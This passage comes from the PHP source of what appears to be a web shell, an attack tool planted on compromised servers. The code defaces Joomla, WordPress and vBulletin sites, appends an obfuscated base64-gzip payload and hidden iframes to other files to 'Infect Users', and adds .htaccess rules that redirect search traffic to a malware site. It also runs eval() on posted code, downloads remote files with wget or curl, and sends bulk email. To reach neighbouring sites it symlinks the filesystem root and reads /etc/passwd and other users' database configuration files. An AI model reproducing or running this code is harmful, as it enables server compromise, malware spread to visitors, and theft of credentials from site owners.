3436 curl_setopt($ch, CURLOPT_HEADER, 0);
3437 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3438 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3439 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3440 $buffer = curl_exec($ch);
3441
3442 $pos = strpos($buffer,'<dd class="message message">');
3443 if($pos === false)
3444 {
3445 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3446 }
3447 else
3448 {
3449 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3450 }
3451 }
3452 else
3453 {
3454 $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
3455 $data = mysql_fetch_array($req);
3456 $template_name=$data["template"];
3457
3458 $url2=$site_url."/index.php";
3459 $ch = curl_init();
3460 curl_setopt($ch, CURLOPT_URL, $url2);
3461 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3462 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3463 curl_setopt($ch, CURLOPT_HEADER, 1);
3464 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3465 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3466 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3467 $buffer = curl_exec($ch);
3468
3469 $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
3470
3471 $url2=$site_url."/index.php";
3472 $ch = curl_init();
3473 curl_setopt($ch, CURLOPT_URL, $url2);
3474 curl_setopt($ch, CURLOPT_POST, 1);
3475 curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
3476 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3477 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3478 curl_setopt($ch, CURLOPT_HEADER, 0);
3479 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3480 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3481 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3482 $buffer = curl_exec($ch);
3483
3484 $pos = strpos($buffer,"com_config");
3485
3486 if($pos === false)
3487 {
3488 echo("<br>[-] Login Error");
3489 exit;
3490 }
3491
3492 $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
3493 $ch = curl_init();
3494 curl_setopt($ch, CURLOPT_URL, $url2);
3495 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3496 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3497 curl_setopt($ch, CURLOPT_HEADER, 0);
3498 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3499 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3500 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3501 $buffer = curl_exec($ch);
3502
3503 $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
3504
3505 if(!$hidden2)
3506 {
3507 echo("<br>[-] index.php Not found in Theme Editor");
3508 }
3509
3510 $url2=$site_url."/index.php?option=com_templates&layout=edit";
3511 $ch = curl_init();
3512 curl_setopt($ch, CURLOPT_URL, $url2);
3513 curl_setopt($ch, CURLOPT_POST, 1);
3514 curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
3515 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3516 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
3517 curl_setopt($ch, CURLOPT_HEADER, 0);
3518 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
3519 curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
3520 curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
3521 $buffer = curl_exec($ch);
3522
3523 $pos = strpos($buffer,'<dd class="message message fade">');
3524 if($pos === false)
3525 {
3526 echo("<center><font size=4><blink>Cannot Deface Joomla</blink></font></center>");
3527 exit;
3528 }
3529 else
3530 {
3531 echo("<center><font class=txt size=4><blink>Joomla Defaced Successfully</blink></font></center>");
3532 }
3533 }
3534 }
3535}
3536else if(isset($_POST['pathtomass']) && $_POST['pathtomass'] != '' && isset($_POST['filetype']) && $_POST['filetype'] != '' && isset($_POST['mode']) && $_POST['mode'] != '' && isset($_POST['injectthis']) && $_POST['injectthis'] != '')
3537{
3538 $filetype = $_POST['filetype'];
3539
3540 $mode = "a";
3541
3542 if($_POST['mode'] == 'Apender')
3543 $mode = "a";
3544
3545 if($_POST['mode'] == 'Overwriter')
3546 $mode = "w";
3547
3548 if (is_dir($_POST['pathtomass']))
3549 {
3550 $lolinject = $_POST['injectthis'];
3551 $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3552 if(substr($_POST['pathtomass'], -1) == "\\")
3553 $mypath = $_POST['pathtomass'] . "*.".$filetype;
3554 foreach (glob($mypath) as $injectj00)
3555 {
3556 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3557 continue;
3558 $fp=fopen($injectj00,$mode);
3559 if (fputs($fp,$lolinject))
3560 echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3561 else
3562 echo 'failed to inject '.$injectj00.'<br>';
3563 }
3564 $dirs = glob($_POST['pathtomass'] . '/*' , GLOB_ONLYDIR);
3565 foreach ($dirs as $dir)
3566 {
3567 injectdir($dir,$filetype,$mode,$lolinject);
3568 }
3569 echo "<center>".$mycount." files injected</center>";
3570 }
3571 else
3572 echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3573}
3574else if(isset($_POST['mailfunction']))
3575{
3576 if($_POST['mailfunction'] == "dobombing")
3577 {
3578 if(isset($_POST['to']) && isset($_POST['subject']) && isset($_POST['message']) && isset($_POST['times']) && $_POST['to'] != '' && $_POST['subject'] != '' && $_POST['message'] != '' && $_POST['times'] != '')
3579 {
3580 $times = $_POST['times'];
3581 while($times--)
3582 {
3583 if(isset($_POST['padding']))
3584 {
3585 $fromPadd = rand(0,9999);
3586 $subjectPadd = " -- ID : ".rand(0,9999999);
3587 $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
3588
3589 }
3590 $from = "hello$fromPadd@abcd.in";
3591 if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
3592 {
3593 $error = 1;
3594 echo "<center><font size=3><blink><blink>Some Error Occured!</blink></font></center>";
3595 break;
3596 }
3597 }
3598 if($error != 1)
3599 echo "<center><font class=txt size=3><blink>Mail(s) Sent!</blink></font></center>";
3600 }
3601 }
3602 else if($_POST['mailfunction'] == "massmailing")
3603 {
3604 if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['message']))
3605 {
3606 if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
3607 echo "<center><font class=txt size=3><blink>Mail Sent!</blink></font></center>";
3608 else
3609 echo "<center><font size=3><blink>Some Error Occured!</blink></font></center>";
3610 }
3611 }
3612}
3613else if(isset($_POST['code']))
3614{
3615 if($_POST['code'] != null && isset($_POST['intext']) && $_POST['intext'] == "true")
3616 {
3617 // FIlter Some Chars we dont need
3618 ?><br>
3619 <textarea name="code" class="box" cols="120" rows="10"><?php
3620 $code = str_replace("<?php","",$_POST['code']);
3621 $code = str_replace("<?","",$code);
3622 $code = str_replace("?>","",$code);
3623
3624 // Evaluate PHP CoDE!
3625 htmlspecialchars(eval($code));
3626 ?>
3627 </textarea><?php
3628 }
3629 else if($_POST['code'] != null && $_POST['intext'] == "false")
3630 {
3631 $code = str_replace("<?php","",$_POST['code']);
3632 $code = str_replace("<?","",$code);
3633 $code = str_replace("?>","",$code);
3634
3635 // Evaluate PHP CoDE!
3636 ?><br><font size="4">Result of execution this PHP-code :</font><br><font class=txt><?php htmlspecialchars(eval($code)); ?></font><?php
3637 }
3638}
3639else if(isset($_GET['infect']))
3640{
3641 $mal_code="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";
3642 $coun = 0;
3643 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3644 {
3645 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3646 continue;
3647 if($myfile=fopen($injectj00,'a'))
3648 {
3649 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3650 fclose($myfile);
3651 $coun = 1;
3652 }
3653 }
3654 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3655 {
3656 if($myfile=fopen($injectj00,'a'))
3657 {
3658 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3659 fclose($myfile);
3660 $coun = 1;
3661 }
3662 }
3663 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3664 {
3665 if($myfile=fopen($injectj00,'a'))
3666 {
3667 fputs($myfile, gzuncompress(base64_decode($mal_code)));
3668 fclose($myfile);
3669 $coun = 1;
3670 }
3671 }
3672 if($coun == 1)
3673 echo "<center>Done !!!!<center>";
3674 else
3675 echo "<center>Cannot open files !!!!<center>";
3676}
3677else if(isset($_GET['infectiframe']))
3678{
3679 $coun = 0;
3680 $str = "<iframe width=0px height=0px frameborder=no name=frame1 src=".$malsite."> </iframe>";
3681 foreach (glob($_GET['path'] . $directorysperator . "*.php") as $injectj00)
3682 {
3683 if($injectj00 == getcwd().$_SERVER['SCRIPT_NAME'])
3684 continue;
3685 if($myfile=fopen($injectj00,'a'))
3686 {
3687 fputs($myfile, $str);
3688 fclose($myfile);
3689 $coun = 1;
3690 }
3691 }
3692 foreach (glob($_GET['path'] . $directorysperator . "*.htm") as $injectj00)
3693 {
3694 if($myfile=fopen($injectj00,'a'))
3695 {
3696 fputs($myfile, $str);
3697 fclose($myfile);
3698 $coun = 1;
3699 }
3700 }
3701 foreach (glob($_GET['path'] . $directorysperator . "*.html") as $injectj00)
3702 {
3703 if($myfile=fopen($injectj00,'a'))
3704 {
3705 fputs($myfile, $str);
3706 fclose($myfile);
3707 $coun = 1;
3708 }
3709 }
3710
3711
3712 if($coun == 1)
3713 echo "<center>Done !!!!<center>";
3714 else
3715 echo "<center>Cannot open files !!!!<center>";
3716}
3717else if(isset($_GET['redirect']))
3718{
3719 if($myfile = fopen(".htaccess",'a'))
3720 {
3721 $mal = "# BEGIN WordPress
3722RewriteEngine On
3723RewriteOptions inherit
3724RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
3725RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
3726RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
3727RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
3728RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
3729RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
3730RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
3731RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
3732RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
3733RewriteRule .* ".$malsite." [R,L]\n\r";
3734 fwrite($myfile, $mal);
3735 fclose($myfile);
3736 echo "<center>Done !!!!<center>";
3737 }
3738 else
3739 echo "<center>Cannot open file !!!!<center>";
3740}
3741else if(isset($_GET['malware']))
3742{ ?>
3743 <input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3744 <center><table><tr><td><a href=# onClick="malwarefun('infect')"><font class=txt size="4">| Infect Users |</font></a></td>
3745 <td><a href=# onClick="malwarefun('infectiframe')"><font class=txt size="4">| Infect Users with Iframe |</font></a></td>
3746 <td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font class=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr></table></center>
3747 <div id="showmal"></div>
3748 <?php
3749}
3750else if(isset($_GET['codeinsert']))
3751{
3752 if($file1 = fopen(".htaccess",'r'))
3753 {
3754 ?><div id="showcode"></div>
3755 <form method=post>
3756 <textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1)) { echo fgets($file1); } ?></textarea><br>
3757 <input type="button" onClick="codeinsert(code.value)" value=" Insert " class=but>
3758 </form>
3759 <?php }
3760 else
3761 echo "<center>Cannot Open File!!</center>";
3762}
3763else if(isset($_POST['getcode']))
3764{
3765 if($myfile = fopen(".htaccess",'a'))
3766 {
3767 fwrite($myfile, $_POST['getcode']);
3768 fwrite($myfile, "\n\r");
3769 fclose($myfile);
3770 echo "<font class=txt>Code Inserted Successfully!!!!</font>";
3771 }
3772 else
3773 echo "Permission Denied";
3774}
3775else if(isset($_GET['uploadurl']))
3776{
3777 $functiontype = trim($_GET['functiontype']);
3778 $wurl = trim($_GET['wurl']);
3779 $path = magicboom($_GET['path']);
3780
3781 function remotedownload($cmd,$url)
3782 {
3783 $namafile = basename($url);
3784 switch($cmd)
3785 {
3786 case 'wwget':
3787 execmd(which('wget')." ".$url." -O ".$namafile);
3788 break;
3789 case 'wlynx':
3790 execmd(which('lynx')." -source ".$url." > ".$namafile);
3791 break;
3792 case 'wfread' :
3793 execmd($wurl,$namafile);
3794 break;
3795 case 'wfetch' :
3796 execmd(which('fetch')." -o ".$namafile." -p ".$url);
3797 break;
3798 case 'wlinks' :
3799 execmd(which('links')." -source ".$url." > ".$namafile);
3800 break;
3801 case 'wget' :
3802 execmd(which('GET')." ".$url." > ".$namafile);
3803 break;
3804 case 'wcurl' :
3805 execmd(which('curl')." ".$url." -o ".$namafile);
3806 break;
3807 default:
3808 break;
3809 }
3810 return $namafile;
3811 }
3812 $namafile = remotedownload($functiontype,$wurl);
3813
3814 $fullpath = $path . $directorysperator . $namafile;
3815 if(is_file($fullpath))
3816 {
3817 echo "<center><font class=txt>File uploaded to $fullpath</font></center>";
3818 }
3819 else
3820 echo "<center>Failed to upload $namafile</center>";
3821}
3822else if(isset($_GET['createfolder']))
3823{
3824 if(!mkdir($_GET['createfolder']))
3825 echo '<BR>Failed To create<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3826 else
3827 echo '<BR><font class=txt>Folder Created Successfully</font><BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR><BR>';
3828}
3829else if(isset($_GET['selfkill']))
3830{
3831 if(unlink($curfile))
3832 echo "<br><center><font size=5>Good Bye......</font></center>";
3833 else
3834 echo "<br><center><font size=5>Shell cannot be removed......</font></center>";
3835}
3836else if(isset($_GET['Create']))
3837{
3838 ?><BR>
3839 <form method="post">
3840 <input type="hidden" name="filecreator" value="<?php echo $_GET['Create']; ?>">
3841 <textarea name="filecontent" rows="12" cols="100" class="box"></textarea><br />
3842 <input type="button" onClick="createfile(filecreator.value,filecontent.value)" value=" Save " class="but"/>
3843 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
3844 </form>
3845
3846<?php }
3847else if(isset($_GET['readfile']))
3848{
3849 if(is_file($_GET['readfile']))
3850 {
3851 $owner = "0/0";
3852 if($os == "Linux")
3853 $owner = getOGid($_GET['readfile']);
3854 ?>
3855 <form>
3856 <table style="width:57%;">
3857 <tr align="left">
3858 <td align="left">File : </td><td><font class=txt><?php echo $_GET['readfile'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['readfile']); ?>')"><?php echo filepermscolor($_GET['readfile']);?></a></td>
3859 </tr>
3860 <tr>
3861 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['readfile']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3862 </tr>
3863 </table>
3864 <textarea name="content" rows="15" cols="100" class="box"><?php
3865 $content = htmlspecialchars(file_get_contents($_GET['readfile']));
3866 if($content)
3867 {
3868 echo $content;
3869 }
3870 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
3871 {
3872 if(filesize($_GET['readfile']) != 0 )
3873 {
3874 fopen($_GET['readfile']);
3875 while(!feof())
3876 {
3877 echo htmlspecialchars(fgets($_GET['readfile']));
3878 }
3879 }
3880 }
3881
3882 ?>
3883 </textarea><br />
3884 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['readfile']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
3885 <input type="button" onClick="cancel()" value="cancel" class="but" />
3886 </form>
3887 <?php
3888 }
3889 else
3890 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
3891}
3892else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
3893{
3894 $content = $_POST['filecontent'];
3895 if($file_pointer = fopen($_POST['filecreator'], "w+"))
3896 {
3897 fwrite($file_pointer, $content);
3898 fclose($file_pointer);
3899 echo "<font class=txt>File Created Successfully</font>";
3900 }
3901 else
3902 echo "Cannot Create File";
3903}
3904else if(isset($_REQUEST["massdeface"]))
3905{
3906?><center><table><tr><td><a href=# onClick="getmydefacedata('masswp')"><font class=txt size="4">| Wordpress |</font></a></td>
3907 <td><a href=# onClick="getmydefacedata('massjo')"><font class=txt size="4">| Joomla |</font></a></td>
3908 <td><a href=# onClick="getmydefacedata('massvb')"><font class=txt size="4">| Vbulletin |</font></a></td>
3909 </tr></table></center><br><div id="showmydeface"></div><?php
3910}
3911else if(isset($_REQUEST["masswp"]))
3912{
3913 ?><center><form method="post">
3914 <textarea id="massdef" cols=80 rows="19" class="box">You Just Got Hacked</textarea>
3915 <br><input type="button" onClick="massdeface('domasswp',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3916}
3917else if(isset($_REQUEST["massjo"]))
3918{
3919 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
3920 <br><input type="button" onClick="massdeface('domassjo',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3921}
3922else if(isset($_REQUEST["massvb"]))
3923{
3924 ?><center><form method="post"><textarea id="massdef" cols=80 rows="20" class="box">You Just Got Hacked</textarea>
3925 <br><input type="button" onClick="massdeface('domassvb',massdef.value)" class="but" value=" Go "></form></center><br><div id="showdef"></div><?php
3926}
3927else if(isset($_REQUEST["massscript"]))
3928{
3929 if($os != "Windows")
3930 {
3931 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
3932 $path=explode('/',$url);
3933 $url =str_replace($path[count($path)-1],'',$url);
3934
3935 if($_REQUEST["massscript"] == "domasswp")
3936 {
3937 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
3938 mkdir("dhanush");
3939 chdir("dhanush");
3940 execmd("ln -s / root");
3941 $file3 = 'Options all
3942 DirectoryIndex Sux.html
3943 AddType text/plain .php
3944 AddHandler server-parsed .php
3945 AddType text/plain .html
3946 AddHandler txt .html
3947 Require None
3948 Satisfy Any
3949 ';
3950 $fp3 = fopen('.htaccess','w');
3951 $fw3 = fwrite($fp3,$file3);
3952 @fclose($fp3);
3953 if(@file('/etc/passwd'))
3954 {
3955 $users = file('/etc/passwd');
3956 foreach($users as $user)
3957 {
3958 $user = explode(':', $user);
3959
3960 $conf = @file_get_contents($url."dhanush/root/home/".$user[0]."/public_html/wp-config.php");
3961 if(entre2v2($conf,"define('DB_USER', '","');"))
3962 changeindexwp($conf,$_REQUEST['massdef']);
3963 }
3964 }
3965 else
3966 {
3967 $temp = "";
3968 $val1 = 0;
3969 $val2 = 1000;
3970 for(;$val1 <= $val2;$val1++)
3971 {
3972 $uid = @posix_getpwuid($val1);
3973 if ($uid)
3974 $temp .= join(':',$uid)."\n";
3975 }
3976
3977 $temp = trim($temp);
3978
3979 if($file5 = fopen("test.txt","w"))
3980 {
3981 fputs($file5,$temp);
3982 fclose($file5);
3983
3984 $file = fopen("test.txt", "r");
3985 while(!feof($file))
3986 {
3987 $s = fgets($file);
3988 $matches = array();
3989 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3990 $matches = str_replace("home/","",$matches[1]);
3991 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3992 continue;
3993 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/wp-config.php");
3994 if(entre2v2($conf,"define('DB_USER', '","');"))
3995 changeindexwp($conf,$_REQUEST['massdef']);
3996 }
3997 fclose($file);
3998 }
3999 }
4000 }
4001 elseif($_REQUEST["massscript"] == "domassjo")
4002 {
4003 mkdir("dhanush");
4004 chdir("dhanush");
4005 $d0mains = @file("/etc/named.conf");
4006 if($d0mains)
4007 {
4008 $defcount = 0;
4009 echo "<center><table border=1 style='width:80%;'><tr align=center><th>Login new info</th><th>Login info</th><th>Site</th><th>Message</th><tr>";
4010 foreach($d0mains as $d0main)
4011 {
4012 if(eregi("zone",$d0main))
4013 {
4014 preg_match_all('#zone "(.*)"#', $d0main, $domains);
4015 flush();
4016
4017 if(strlen(trim($domains[1][0])) > 2)
4018 {
4019 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
4020 $conf = @file_get_contents($url."dhanush/root/home/".$user['name']."/public_html/configuration.php");
4021 if(entre2v2($conf,$dol."user = '","';"))
4022 changeindexjo($conf,$_REQUEST['massdef'],$domains[1][0]);
4023 }
4024 }
4025 }
4026 echo '</table><br><h3>'.$defcount.' sites defaced</h3>';
4027 }
4028 else
4029 echo "Cannot Read /etc/named.conf";
4030 }
4031 elseif($_REQUEST["massscript"] == "domassvb")
4032 {
4033 mkdir("dhanush");
4034 chdir("dhanush");
4035 echo "<center><table border=1 style='width:70%;'><tr align=center><th>Site</th><th>Message</th><tr>";
4036
4037 if(@file('/etc/passwd'))
4038 {
4039 $users = file('/etc/passwd');
4040 foreach($users as $user)
4041 {
4042 $user = explode(':', $user);
4043 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/includes/config.php");
4044 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4045 changeindexvb($conf,$_REQUEST['massdef']);
4046 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/configuration.php");
4047 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4048 changeindexvb($conf,$_REQUEST['massdef']);
4049 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/forum/configuration.php");
4050 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4051 changeindexvb($conf,$_REQUEST['massdef']);
4052 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/core/configuration.php");
4053 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4054 changeindexvb($conf,$_REQUEST['massdef']);
4055 $conf = @file_get_contents($url."dhanush/root/home/".$user['0']."/public_html/vb/core/configuration.php");
4056 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4057 changeindexvb($conf,$_REQUEST['massdef']);
4058 }
4059 }
4060 else
4061 {
4062 $temp = "";
4063 $val1 = 0;
4064 $val2 = 1000;
4065 for(;$val1 <= $val2;$val1++)
4066 {
4067 $uid = @posix_getpwuid($val1);
4068 if ($uid)
4069 $temp .= join(':',$uid)."\n";
4070 }
4071
4072 $temp = trim($temp);
4073
4074 if($file5 = fopen("test.txt","w"))
4075 {
4076 fputs($file5,$temp);
4077 fclose($file5);
4078
4079 $file = fopen("test.txt", "r");
4080 while(!feof($file))
4081 {
4082 $s = fgets($file);
4083 $matches = array();
4084 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
4085 $matches = str_replace("home/","",$matches[1]);
4086 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
4087 continue;
